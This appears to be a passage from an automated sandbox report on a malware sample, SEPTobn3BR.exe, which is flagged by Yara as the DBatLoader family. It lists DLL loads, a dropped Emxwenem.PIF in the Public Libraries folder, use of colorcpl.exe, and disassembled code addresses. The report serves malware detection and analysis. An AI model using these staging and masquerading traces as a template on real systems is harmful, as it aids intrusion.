                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: spp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: advapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: spp.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppwmi.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppcext.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: winscard.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: olepro32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: url.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wininet.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: tquery.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppwmi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: slc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppcext.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winscard.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: devobj.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: olepro32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: url.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wininet.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: tquery.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppwmi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: slc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppcext.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winscard.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: devobj.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: SEPTobn3BR.exeStatic file information: File size 1362944 > 1048576
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007EE000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected DBatLoader
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1334500441.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452056215.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B987A0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BAC2FC push 02BAC367h; ret 0_2_02BAC35F
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8635A push 02B863B7h; ret 0_2_02B863AF
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8635C push 02B863B7h; ret 0_2_02B863AF
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BAC0AC push 02BAC125h; ret 0_2_02BAC11D
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BAC1F8 push 02BAC288h; ret 0_2_02BAC280
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C36194 push eax; ret 0_2_02C361B2
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C14162 push ecx; ret 0_2_02C14175
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BAC144 push 02BAC1ECh; ret 0_2_02BAC1E4
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B986C0 push 02B98702h; ret 0_2_02B986FA
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8673E push 02B86782h; ret 0_2_02B8677A
